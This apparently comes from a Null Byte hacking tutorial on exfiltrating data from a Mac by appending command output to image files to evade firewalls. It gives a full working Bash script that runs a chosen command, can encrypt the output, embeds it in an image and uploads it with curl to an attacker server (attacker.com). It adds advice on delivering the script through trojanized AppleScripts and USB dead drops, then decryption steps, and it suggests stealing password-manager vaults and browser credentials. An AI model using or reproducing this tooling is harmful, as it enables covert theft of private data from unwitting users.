
Using images to smuggle data through firewalls «Null Byte :: WonderHowTo



Data can be embedded in images quickly and without any metadata tools. An attacker can use this to exfiltrate sensitive information from a MacBook by uploading the images to ordinary file-sharing sites.

We'll explore DPI workarounds, payload obfuscation, and an alternative use of popular firewall-bypass sites to carry data embedded in images. Unlike storing data in an image's metadata tags, this method appends text directly to the end of the image file.

Understanding the Attack

For this article, a simple Bash script was written to illustrate how easily an attacker can exfiltrate data inside images found on a target Mac. The script is below and can also be viewed on my GitHub.

#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# This is the command that gets executed and embedded into the photo.
# Single quotes are used here to make it easier to escape special
# characters in the desired command.
exfilData='ls -lah "/Users/$USER/"'

# Where the attacker's PHP server is located. This should be
# updated to use a public domain like Dropbox or something else
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image is downloaded and used instead. By default, the script
# tries to use an image already on the MacBook to minimize the
# traffic coming from the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# Use the `find` command to locate a suitable image to embed the
# data in. The user's home directory (~) is searched for the
# first (-print -quit) JPG, JPEG or PNG smaller than 100k.
# The maximum file size and file types are somewhat arbitrary.
# The size can be increased and the file types extended to
# cover, for example, MP3, PDF and MOV files.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hard-coded
# in the payload for convenience, which makes it possible to
# reverse engineer and decrypt the exfiltrated data in the
# image. This is a quick and dirty solution.
pass="password123"

# An "if" statement to determine whether a suitable PNG or JPG
# was found. If not, the backup image defined earlier in the
# script (tmpImage) is downloaded.
if [[ ! -f "$findImage" ]]; then
    # Curl silently (-s) downloads the backup image and
    # saves it (-o) in /tmp with the file name i.jpg.
    curl -s "$tmpImage" -o "/tmp/i.jpg"
    # The backup image is stored in the variable exfilImage for
    # later commands.
    exfilImage="/tmp/i.jpg"
else
    # If a suitable image was found, the variable exfilImage
    # is set to it for later commands.
    exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload before
# embedding it in the picture. Set to "1" to enable encryption,
# "0" to disable it.
useEncrypt='1'

# An if statement to check the value of the useEncrypt
# variable. `1` encrypts with openssl (LibreSSL).
# Otherwise the data is not encrypted.
if [[ "$useEncrypt" = '1' ]]; then
    # OpenSSL encrypts (enc) the payload output with AES-256-CBC
    # and base64-encodes the encrypted data on a single line
    # (-a -A) using the password ($pass).
    exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
    # If encryption isn't used, Bash will evaluate the variable
    # and execute it as a command.
    exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into the
# image. It appends (>>) the data on a new line (\n\n).
# The newlines make it easy to extract the data quickly
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl transfers the image to the attacker's PHP server.
curl -F "image=@$exfilImage" "$exfilSite"

The script first executes an arbitrary command (for example, system_profiler). The output of that command is the data the attacker wants to exfiltrate. The script then tries to find a JPEG or PNG in the target's home directory (~/) and appends the command output directly to the image. The image is then immediately uploaded to a website of the attacker's choosing, with the data smuggled inside.

Below is a small image file opened with the nano text editor in Kali. The image shows up as unusual characters because image files are not meant to be opened in a text editor.


Scrolling to the end of the same file reveals the output of the ls and system_profiler commands.


total 80
drwx------+ 19 user staff 608B May  3 14:22 Desktop
drwxr-xr-x+ 17 user staff 544B May  3 01:00 .
-rw-------   1 user staff  55B May  3 01:00 .lesshst
drwx------  59 user staff 1.8K May  2 23:48 .bash_sessions
-rw-------   1 user staff  23K May  2 22:17 .bash_history
-rw-r--r--@  1 user staff 8.0K May  2 22:11 .DS_Store
drwx------   7 user staff 224B Apr 28 06:46 .Trash
drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
drwx------@ 55 user staff 1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user staff 480B Nov 18 11:36 .atom
drwx------+  4 user staff 128B Nov 18 06:32 Downloads
drwx------   3 user staff  96B Nov 18 05:51 .config
drwx------+  3 user staff  96B Oct 29  2018 Movies
drwx------+  3 user staff  96B Oct 29  2018 Music
drwx------+  3 user staff  96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user staff 128B Oct 29  2018 Public
drwxr-xr-x   5 root admin 160B Oct 29  2018 ..

Firewall:

    Firewall Settings:

      Mode: Allow all incoming connections
      Firewall Logging: Yes
      Stealth Mode: No

The technical details of why storing data this way works are beyond the scope of this article. The important point is that data appended at the end of the file does not corrupt the image. Image viewers like Apple's Preview still open it without any sign of the extra data, which makes images an excellent transport mechanism for data exfiltration.

The script inserts the data into the image file with I/O redirection. Just as data can be appended to a text file with >>, the script appends the command output to the end of the image file.

Why Exfiltrate Data in Images?

The main advantage of exfiltrating data this way is firewall bypass. With network-based firewall solutions, every packet leaving a particular device on the network can be inspected. Strict firewall policies make it difficult for an attacker to move large amounts of information out of the network. Smuggling the data inside images helps get around this problem.

Wireshark capturing an image carrying exfiltrated data as it is sent to a website.

Understanding the Payload

Let's break down the script line by line.

It starts with several variables that should be changed to suit the scenario. The first determines which command runs on the target MacBook; the output of that command is embedded in the image file. The example below runs a simple ls of the target's home directory. Single quotes are used for this variable to make escaping special characters easier; keep this in mind when entering commands to execute.

exfilData='ls -lah "/Users/$USER/"'

There are many places the image can be exfiltrated to. Sites like Dropbox and Flickr have official APIs that make uploading files as convenient as possible for end users (and attackers). Likewise, curl can emulate POST requests and send the image to file-sharing sites and other forums. For this demonstration, a simple PHP server on the attacker's system is used.

exfilSite="http://attacker.com/index.php"

As we'll see later in the script, it tries to locate a usable image on the target in which to store the output data. If none is found, the script downloads the following image and uses it instead. The URL points to an arbitrary image on one of Apple's domains, but it could be literally any JPEG or PNG on the internet.

tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

The script looks for a regular file (-type f) smaller than 100k (-size -100k) with a JPEG, JPG, or PNG extension. The first match (-print -quit) is used as the exfiltration file. The size limit is mostly arbitrary; smaller image files simply upload faster. These find options mainly show how the criteria could be refined.

findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

The script can encrypt the command output before embedding it in the image. Set the variable to 1 to enable encryption or 0 to disable it.

useEncrypt='1'

If encryption is enabled, the password below is used to protect the output data. For simplicity it is hard-coded in the payload, which means anyone who obtains the payload can reverse-engineer it and decrypt the exfiltrated data in the image. It is only meant as a quick and dirty solution; public-key encryption would be more appropriate here.

pass="password123"

The rest of the script does not need to be changed; the variables above are referenced in the sections that follow.

Below is the first of two if statements. It checks whether a suitable JPEG or PNG was found and, if not, downloads the Apple image defined in the tmpImage variable.

if [[ ! -f "$findImage" ]]; then
    curl -s "$tmpImage" -o "/tmp/i.jpg"
    exfilImage="/tmp/i.jpg"
else
    exfilImage="$findImage"
fi

The second if statement uses OpenSSL (LibreSSL on macOS and Mac OS X) to encrypt the output data with the $pass password. Otherwise, the output data is left unencrypted and appended to the image in clear text.

if [[ "$useEncrypt" = '1' ]]; then
    exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
    exfilData="$(eval $exfilData)"
fi

Here is the I/O redirection. printf appends (>>) the command output to the image file. Two newlines (\n\n) separate the injected data from the raw image bytes, which makes extraction easier in the following steps.

printf '\n\n%s' "$exfilData" >> "$exfilImage"

Finally, curl sends the image to the attacker's server using the -F (form upload) option.

curl -F "image=@$exfilImage" "$exfilSite"

Step 1: Start the PHP Server

While file-sharing sites are ideal for this attack, I'll quickly show how a local PHP server in Kali can be used to capture the images sent from the target's MacBook. This guide does not cover the PHP side in detail.

Save the following PHP code in a file named "index.php" and start the server with php -S 0.0.0.0:80.

   

Step 2: Deploy the Payload

There are several ways to get a Mac user to execute malicious code. The simplest is to social-engineer the target into opening a trojanized AppleScript. This can be done with USB dead-drop attacks, to which macOS is highly susceptible, or by bypassing Gatekeeper remotely.

Trojanized application disguised as an ordinary PDF.

For more on USB dead drops, see our article on hacking Wi-Fi passwords with USB dead drops. It focuses on compromising Windows 10 targets, but it covers using USB flash drives as an attack vector in detail.

Step 3: Access the Exfiltrated Data

Once the PHP server has received the exfiltrated image, the embedded data can be extracted. If payload encryption is disabled, the tail command is enough; adjust the number of lines (-n) to print as needed.

 ~ $ tail -n 20 image.png


total 80
drwx------+ 19 user staff 608B May  3 14:22 Desktop
drwxr-xr-x+ 17 user staff 544B May  3 01:00 .
-rw-------   1 user staff  55B May  3 01:00 .lesshst
drwx------  59 user staff 1.8K May  2 23:48 .bash_sessions
-rw-------   1 user staff  23K May  2 22:17 .bash_history
-rw-r--r--@  1 user staff 8.0K May  2 22:11 .DS_Store
drwx------   7 user staff 224B Apr 28 06:46 .Trash
drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
drwx------@ 55 user staff 1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user staff 480B Nov 18 11:36 .atom
drwx------+  4 user staff 128B Nov 18 06:32 Downloads
drwx------   3 user staff  96B Nov 18 05:51 .config
drwx------+  3 user staff  96B Oct 29  2018 Movies
drwx------+  3 user staff  96B Oct 29  2018 Music
drwx------+  3 user staff  96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user staff 128B Oct 29  2018 Public
drwxr-xr-x   5 root admin 160B Oct 29  2018 ..

If encryption is enabled, OpenSSL (LibreSSL) is needed in Kali to decrypt the data. Make sure LibreSSL version 2.8 is installed: in my testing, version 2.9.x did not appear to be compatible with Mojave's version of LibreSSL, and the data could not be decrypted.

First download the LibreSSL tarball in Kali.

 ~ $ wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz'

--2019-04-28 21:08:46--  https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org)... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org)|129.128.5.191|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3373599 (3.2M) [text/plain]
Saving to: 'libressl-2.8.2.tar.gz'

libressl-2.8.2.tar.gz    100%[==============>]   3.22M   255KB/s    in 25s

2019-04-28 21:09:15 (133 KB/s) - 'libressl-2.8.2.tar.gz' saved [3373599/3373599]

Decompress it with tar, which extracts (x) the gzipped (z) file (f).

 ~ $ tar -xzf libressl-*.tar.gz

libressl-2.8.2/m4/check-hardening-options.m4
libressl-2.8.2/m4/check-libc.m4
libressl-2.8.2/m4/check-os-options.m4
libressl-2.8.2/m4/disable-compiler-warnings.m4
libressl-2.8.2/m4/libtool.m4

...

libressl-2.8.2/man/tls_load_file.3
libressl-2.8.2/man/tls_ocsp_process_response.3
libressl-2.8.2/man/tls_read.3
libressl-2.8.2/man/openssl.cnf.5
libressl-2.8.2/man/x509v3.cnf.5
libressl-2.8.2/man/Makefile.in
libressl-2.8.2/man/CMakeLists.txt

When that finishes, change (cd) into the new libressl*/ directory.

 ~ $ cd libressl-*/

Run ./configure to make sure everything is ready, then make to build the application. The process takes a few minutes.

 ~ $ ./configure && make

checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p

...

make[1]: Entering directory '/opt/libressl-2.8.2/man'
make[1]: Nothing to be done for 'all'.
make[1]: Leaving directory '/opt/libressl-2.8.2/man'
make[1]: Entering directory '/opt/libressl-2.8.2'
make[1]: Nothing to be done for 'all-am'.
make[1]: Leaving directory '/opt/libressl-2.8.2'

Then use make install to install the required software into the appropriate system directories.

 ~ $ make install

make install
Making install in crypto
make[1]: Entering directory '/opt/libressl-2.8.2/crypto'
make install-am
make[2]: Entering directory '/opt/libressl-2.8.2/crypto'

...

make[2]: Nothing to be done for 'install-exec-am'.
/usr/bin/mkdir -p '/usr/local/lib/pkgconfig'
/usr/bin/install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc '/usr/local/lib/pkgconfig'
make[2]: Leaving directory '/opt/libressl-2.8.2'
make[1]: Leaving directory '/opt/libressl-2.8.2'

Use the ldconfig command to create the required links and update the cache of shared libraries.

 ~ $ ldconfig 

To verify that the installation was successful, use whereis to locate the openssl binaries.

 ~ $ whereis openssl

openssl: /usr/bin/openssl /usr/local/bin/openssl /usr/share/man/man1/openssl.1ssl.gz

The binary in /usr/local/bin/ is the newly installed version, which can be confirmed with the following openssl command.

 ~ $ /usr/local/bin/openssl version

LibreSSL 2.8.2

With LibreSSL installed, the data in the image can be extracted and decrypted with the following command.

 ~ $ /usr/local/bin/openssl enc -d -aes-256-cbc -a -A -pass pass:password123 -in <(tail -n1 image.png)

total 80
drwx------+ 19 user staff 608B May  3 14:22 Desktop
drwxr-xr-x+ 17 user staff 544B May  3 01:00 .
-rw-------   1 user staff  55B May  3 01:00 .lesshst
drwx------  59 user staff 1.8K May  2 23:48 .bash_sessions
-rw-------   1 user staff  23K May  2 22:17 .bash_history
-rw-r--r--@  1 user staff 8.0K May  2 22:11 .DS_Store
drwx------   7 user staff 224B Apr 28 06:46 .Trash
drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
drwx------@ 55 user staff 1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user staff 480B Nov 18 11:36 .atom
drwx------+  4 user staff 128B Nov 18 06:32 Downloads
drwx------   3 user staff  96B Nov 18 05:51 .config
drwx------+  3 user staff  96B Oct 29  2018 Movies
drwx------+  3 user staff  96B Oct 29  2018 Music
drwx------+  3 user staff  96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user staff 128B Oct 29  2018 Public
drwxr-xr-x   5 root admin 160B Oct 29  2018 ..

The payload used in this article (ls) is an elementary example. In a real-world scenario, an attacker could design the script to find and exfiltrate LastPass and 1Password data for offline brute-force attacks. Other targets could include cached browser passwords, terminal history, web traffic, and any other data the attacker considers valuable. If all else fails, send me a message on Twitter @tokyoneon_.


Cover image and screenshots by tokyoneon/Null Byte



